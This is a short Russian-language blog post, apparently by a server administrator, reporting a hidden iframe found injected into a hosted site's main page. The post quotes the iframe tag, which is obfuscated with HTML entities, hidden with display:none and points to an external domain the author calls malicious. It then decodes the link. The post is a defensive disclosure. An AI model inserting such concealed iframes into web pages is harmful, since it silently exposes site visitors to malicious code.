Заглянул сегодня на один из сайтов который хостится у меня на сервере и тут же был извещен антивирусом о попытке подгрузить зловредный код. Полез искать где же там вирус сидит. После изучения кода страницы обнаружил вот такую хитро шифрованную ссылку:

<iframe src=»http://jL.ch&#117;ra.pl&#47;rc/» style=»d&#105;splay:none»></iframe>

В чистом виде ссылка ведет на jL.chura.pl/rc/ (лучше не ходить туда)

Владелец данного сайта адекватный человек и вряд ли сам додумался поставить на главную страницу подобный код. Будем разбираться.